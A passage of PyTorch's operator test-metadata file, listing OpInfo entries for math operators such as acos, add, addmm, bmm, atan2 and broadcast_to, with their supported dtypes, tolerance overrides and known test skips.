# https://github.com/pytorch/pytorch/blob/master/test/test_unary_ufuncs.py#L440-L449 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_out_arg_all_dtypes', dtypes=[torch.cfloat, torch.cdouble]), # The complex formula might be wrong DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_forward_mode_AD', dtypes=complex_types()), # Forward-over-reverse gradgrad might be wrong for complex (see above): DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=complex_types()), # nonzero_count not implemented DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_consistency', dtypes=(torch.chalf,)), # nonzero_count not implemented DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_inplace', dtypes=(torch.chalf,)), # nonzero_count not implemented DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_out', dtypes=(torch.chalf,)), # add_out_op2_sparse_csr DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_zero_to_zero_correspondence_unary', dtypes=(torch.chalf,)), ), supports_fwgrad_bwgrad=True, assert_autodiffed=True, supports_sparse_csr=True, supports_forward_ad=True), # NOTE: CPU complex acos produces incorrect outputs (https://github.com/pytorch/pytorch/issues/42952) UnaryUfuncInfo('acos', aliases=('arccos', ), ref=np.arccos, domain=(-1, 1), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=(precisionOverride({torch.float16: 1e-2, torch.bfloat16: 1e-1, torch.complex64: 1e-2}),), skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_normal', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), # Failing with wrong imaginary sign on at least some Windows jobs DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), # Failing with wrong imaginary sign on at least some Windows jobs DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_grad', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_method_grad', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_inplace_grad', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_forward_mode_AD', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_inplace_forward_mode_AD', dtypes=[torch.cdouble], active_if=IS_WINDOWS), )), # NOTE: the derivative for inplace acosh is not implemented UnaryUfuncInfo('acosh', aliases=('arccosh', ), 
ref=np.arccosh, domain=(1, None), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), # "rsqrt_cuda" not implemented for 'BFloat16' backward_dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), decorators=(precisionOverride({torch.bfloat16: 5e-2}),), supports_inplace_autograd=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_normal', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), # Failing with wrong imaginary sign on at least some Windows jobs DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), # Reference: https://github.com/pytorch/pytorch/issues/50692 DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_grad', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_method_grad', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_forward_mode_AD', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), ), # acosh is not defined at x < 1 (real) or |z| < 1 (complex) reference_numerics_filter=NumericsFilter( condition=lambda x: (torch.abs(x) < 1 if x.is_complex() else x < 1), safe_val=2)), BinaryUfuncInfo('add', # NumPy has no builtin reference for the alpha kwarg, but it is easy enough to emulate ref=lambda input, other, *, alpha=1: np.add(input, other) if alpha == 1 \ else np.add(input, np.multiply(alpha, other)), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16, torch.chalf), assert_autodiffed=True, sample_inputs_func=sample_inputs_add_sub, supports_fwgrad_bwgrad=True, supports_forward_ad=True, supports_two_python_scalars=True, decorators=( DecorateInfo( toleranceOverride({torch.chalf: tol(atol=1e-2, rtol=0)}), 'TestBinaryUfuncs', 'test_reference_numerics'), ), skips=( # boolean alpha not handled properly DecorateInfo(unittest.expectedFailure, 'TestCudaFuserOpInfo', 'test_nvfuser_correctness', dtypes=(torch.bool,)), # boolean alpha not handled properly DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.bool,)), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_numpy_refs', dtypes=(torch.complex128,)), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics_extremal_values', dtypes=(torch.complex64, torch.complex128)), )), BinaryUfuncInfo('mul', aliases=('multiply',), 
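# supports_two_python_scalars=True (below) opts mul into the binary-ufunc test variants that pass plain Python numbers for both operands, exercising the scalar-wrapping overloads as well as tensor inputs.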
dtypes=all_types_and_complex_and(torch.chalf, torch.float16, torch.bfloat16, torch.bool), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_two_python_scalars=True), BinaryUfuncInfo('sub', # NumPy has no builtin reference for the alpha kwarg, but it is easy enough to emulate ref=lambda input, other, *, alpha=1: np.subtract(input, np.multiply(alpha, other)), aliases=('subtract',), dtypes=all_types_and_complex_and(torch.bfloat16, torch.float16, torch.chalf), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_add_sub, supports_two_python_scalars=True, decorators=( DecorateInfo( toleranceOverride({torch.float16: tol(atol=1e-2, rtol=0)}), 'TestBinaryUfuncs', 'test_reference_numerics'), DecorateInfo( toleranceOverride({torch.chalf: tol(atol=1e-2, rtol=0)}), 'TestCommon', 'test_complex_half_reference_testing', device_type='cpu'), DecorateInfo( toleranceOverride({torch.chalf: tol(atol=5e-3, rtol=0)}), 'TestDecomp', 'test_comprehensive', device_type='cpu'), DecorateInfo( toleranceOverride({torch.chalf: tol(atol=5e-3, rtol=0)}), 'TestDecomp', 'test_quick', device_type='cpu'), ), skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics', dtypes=(torch.uint8,)), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics_small_values', dtypes=(torch.uint8,)), )), OpInfo('addmm', # This addmm OpInfo is for when alpha and beta are not both equal to 1. # alpha=beta=1 is tested in the following opinfo, because that special case will # trigger addmm being decomposed by a jit pass. dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfROCM=floating_and_complex_types_and(torch.float16, torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if CUDA11OrLater else []), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=sample_inputs_addmm), OpInfo('addmm', # When alpha=beta=1 as compile-time constants, JIT will decompose addmm into mm and add. 
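# autodiff_nonfusible_nodes below is used to check that the differentiated graph really contains aten::add and aten::mm rather than a single fused aten::addmm call.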
variant_test_name='decomposed', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if(CUDA11OrLater or TEST_WITH_ROCM) else []), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, autodiff_nonfusible_nodes=['aten::add', 'aten::mm'], sample_inputs_func=partial(sample_inputs_addmm, alpha=1, beta=1), skips=( # https://github.com/pytorch/pytorch/issues/71784 DecorateInfo(unittest.skip('Skipped!'), 'TestNNCOpInfo', 'test_nnc_correctness', device_type='cpu', dtypes=(torch.float16,)), DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness', dtypes=(torch.float16,)), )), OpInfo('addmv', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.complex64, torch.complex128, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_addmv), OpInfo('addbmm', ref=lambda M, batch1, batch2, beta=1, alpha=1: np.add(np.multiply(np.asarray(beta, dtype=M.dtype), M), np.multiply(np.asarray(alpha, dtype=batch1.dtype), np.sum(np.matmul(batch1, batch2), axis=0))), dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (SM53OrLater and CUDA11OrLater) or TEST_WITH_ROCM else []), supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[ DecorateInfo( toleranceOverride({torch.float32: tol(atol=1.3e-05, rtol=1.3e-05), torch.complex64: tol(atol=1e-05, rtol=1.2e-03)}), 'TestCommon', 'test_numpy_refs')], skips=( # NVIDIA only assures that bfloat16 is supported by bmm if SM >= 5.3 DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_dtypes', device_type='cuda', active_if=not SM53OrLater), # addbmm does not correctly warn when resizing out= inputs DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warning'), # https://github.com/pytorch/pytorch/issues/55907 DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager'), ), sample_inputs_func=sample_inputs_addbmm), OpInfo('baddbmm', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.complex64, torch.complex128, *[torch.bfloat16] if CUDA11OrLater or TEST_WITH_ROCM else []), backward_dtypesIfCUDA=floating_types_and(torch.float16, *[torch.bfloat16] if SM53OrLater or TEST_WITH_ROCM else [], torch.complex64, torch.complex128), supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[ DecorateInfo( toleranceOverride({torch.complex64: tol(atol=1e-05, rtol=1.2e-03)}), 'TestCommon', 'test_variant_consistency_eager', device_type='cuda'), DecorateInfo( toleranceOverride({torch.complex64: tol(atol=1e-05, rtol=1.2e-03)}), 'TestMathBits', 'test_conj_view', device_type='cuda')], sample_inputs_func=sample_inputs_baddbmm), OpInfo('dot', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), assert_autodiffed=True, sample_inputs_func=sample_inputs_dot_vdot, supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), OpInfo('vdot', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), sample_inputs_func=sample_inputs_dot_vdot, supports_forward_ad=True, 
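# vdot conjugates its first argument for complex inputs (like np.vdot), which is why it can share sample_inputs_dot_vdot with dot above.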
supports_fwgrad_bwgrad=True, ), OpInfo('bmm', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (SM53OrLater and CUDA11OrLater) or TEST_WITH_ROCM else []), assert_autodiffed=True, assert_jit_shape_analysis=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # NVIDIA only assures that bfloat16 is supported by bmm if SM >= 5.3 DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_dtypes', device_type='cuda', active_if=not SM53OrLater), ), sample_inputs_func=sample_inputs_bmm), OpInfo('mv', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_mv), OpInfo('addr', dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), backward_dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), backward_dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), # Reference: https://github.com/pytorch/pytorch/issues/50747 supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # Reference: https://github.com/pytorch/pytorch/issues/50747 DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16)), ), sample_inputs_func=sample_inputs_addr, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL), OpInfo('addcmul', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.float16, torch.bfloat16), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # TODO: update sample inputs with for_inplace_variant kwarg to support this test DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_variant_consistency_eager'), # 76047 DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.int8, torch.int16, torch.int32, torch.int64)), ), sample_inputs_func=sample_inputs_addcmul_addcdiv), OpInfo('addcdiv', dtypes=floating_and_complex_types_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # TODO: update sample inputs with for_inplace_variant kwarg to support this test DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_variant_consistency_eager'), ), sample_inputs_func=sample_inputs_addcmul_addcdiv), UnaryUfuncInfo('asin', aliases=('arcsin', ), ref=np.arcsin, domain=(-1, 1), supports_sparse=True, supports_sparse_csr=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.chalf, torch.bool, torch.half, torch.bfloat16), backward_dtypesIfCUDA=floating_and_complex_types_and(torch.half, torch.bfloat16), assert_autodiffed=True, decorators=[ DecorateInfo( toleranceOverride({torch.float16: tol(atol=1e-05, rtol=1e-03)}), 'TestUnaryUfuncs', device_type='cuda'), precisionOverride({torch.bfloat16: 1e-2}), ], skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', 
dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped! sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), # RuntimeError: "nonzero_cuda" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_consistency', dtypes=(torch.chalf,)), # RuntimeError: "nonzero_cuda" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_inplace', dtypes=(torch.chalf,)), # RuntimeError: "nonzero_cuda" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_out', dtypes=(torch.chalf,)), # RuntimeError: "add_out_op2_sparse_csr" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_zero_to_zero_correspondence_unary', dtypes=(torch.chalf,)), )), # NOTE: derivative for inplace asinh is not implemented UnaryUfuncInfo('asinh', aliases=('arcsinh', ), ref=np.arcsinh, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), decorators=(precisionOverride({torch.bfloat16: 5e-2}),), supports_inplace_autograd=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_normal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped! 
sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), )), UnaryUfuncInfo('atan', aliases=('arctan', ), ref=np.arctan, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.chalf, torch.bool, torch.half, torch.bfloat16), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, decorators=(precisionOverride({torch.bfloat16: 1e-2}),), skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', active_if=TEST_WITH_ROCM, device_type='cuda'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', active_if=TEST_WITH_ROCM, device_type='cuda', dtypes=[torch.complex128]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cuda', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cuda', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped! sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), # RuntimeError: "nonzero_cuda" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_consistency', dtypes=(torch.chalf,)), # same reason as above DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_inplace', dtypes=(torch.chalf,)), # same reason as above DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_out', dtypes=(torch.chalf,)), # RuntimeError: "add_out_op2_sparse_csr" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_zero_to_zero_correspondence_unary', dtypes=(torch.chalf,)), )), BinaryUfuncInfo('atan2', aliases=('arctan2',), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, promotes_int_to_float=True, supports_rhs_python_scalar=False, skips=( # Incorrectly attempts to use a scalar for the second argument DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_jit_alias_remapping'), )), UnaryUfuncInfo('atanh', aliases=('arctanh', ), ref=np.arctanh, domain=(-1, 1), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), decorators=(precisionOverride({torch.bfloat16: 1e-2}),), supports_inplace_autograd=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), 
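# atanh diverges at +/-1, so complex reference comparisons near the domain boundary are platform-sensitive; hence the conditional skips in this entry.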
DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cuda', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cuda', dtypes=[torch.cfloat], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped! sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', active_if=TEST_WITH_ROCM, device_type='cuda', dtypes=[torch.complex128]), )), OpInfo('allclose', dtypes=floating_and_complex_types_and(torch.float16, torch.bfloat16), ref=np.allclose, supports_autograd=False, supports_forward_ad=False, sample_inputs_func=sample_inputs_allclose, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo', 'test_nnc_correctness'), DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), ), supports_out=False), OpInfo('broadcast_to', ref=np.broadcast_to, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_broadcast_to), OpInfo('broadcast_shapes', op=torch.broadcast_shapes, ref=np.broadcast_shapes if np.lib.NumpyVersion(np.__version__) >= '1.20.0' else None, dtypes=_dispatch_dtypes((torch.float32,)), supports_out=False, supports_gradgrad=False, assert_autodiffed=False, supports_autograd=False, supports_scripting=False, sample_inputs_func=sample_inputs_broadcast_shapes, skips=( # https://github.com/pytorch/pytorch/issues/64997 DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # skip dtype tests since broadcast_shape is not device dependent. # having dtypes limited to torch.float32 would cause test_dtypes to report unexpected success DecorateInfo(unittest.skip('Skipped!'), 'TestCommon', 'test_dtypes'), # skip these tests since we have non tensor input DecorateInfo(unittest.skip('Skipped!'), "TestCommon", "test_noncontiguous_samples"), DecorateInfo(unittest.skip('Skipped!'), 'TestCommon', 'test_variant_consistency_eager'), DecorateInfo(unittest.skip('Skipped!'), 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('broadcast_tensors', ref=np.broadcast_arrays, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_broadcast_tensors, reference_inputs_func=reference_inputs_broadcast_tensors, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # https://github.com/pytorch/pytorch/issues/64997 DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # JIT does not support variadic tensors. # RuntimeError: input->type()->kind() == TypeKind::OptionalType # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":252, # please report a bug to PyTorch. 
DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=[torch.float32]), )), OpInfo('block_diag', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # Default batching rule in core doesn't work for ops with TensorList args check_batched_forward_grad=False, skips=( # https://github.com/pytorch/pytorch/issues/64997 DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # JIT does not support variadic tensors. # RuntimeError: input->type()->kind() == TypeKind::OptionalType # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":252, # please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=[torch.float32]), ), sample_inputs_func=sample_inputs_block_diag), UnaryUfuncInfo('bitwise_not', ref=np.bitwise_not, dtypes=integral_types_and(torch.bool), operator_variant=operator.invert, supports_autograd=False), BinaryUfuncInfo('bitwise_left_shift', op=torch.bitwise_left_shift, dtypes=integral_types(), dtypesIfCUDA=integral_types(), operator_variant=operator.lshift, inplace_operator_variant=operator.ilshift, supports_autograd=False, supports_one_python_scalar=True, rhs_make_tensor_kwargs=dict(low=0), skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_type_promotion'), )), BinaryUfuncInfo('bitwise_right_shift', op=torch.bitwise_right_shift, dtypes=integral_types(), dtypesIfCUDA=integral_types(), operator_variant=operator.rshift, inplace_operator_variant=operator.irshift, supports_autograd=False, supports_one_python_scalar=True, rhs_make_tensor_kwargs=dict(low=0), skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_type_promotion'), )), OpInfo('combinations', op=torch.combinations, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, sample_inputs_func=sample_inputs_combinations), OpInfo('cartesian_prod', op=torch.cartesian_prod, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_cartesian_prod, skips=( DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # RuntimeError: input->type()->kind() == TypeKind::OptionalType # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":270 DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.float32,)), )), OpInfo('cdist', dtypes=floating_types(), supports_out=False, supports_gradgrad=False, assert_autodiffed=False, sample_inputs_func=sample_inputs_cdist), UnaryUfuncInfo('ceil', ref=np.ceil, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, 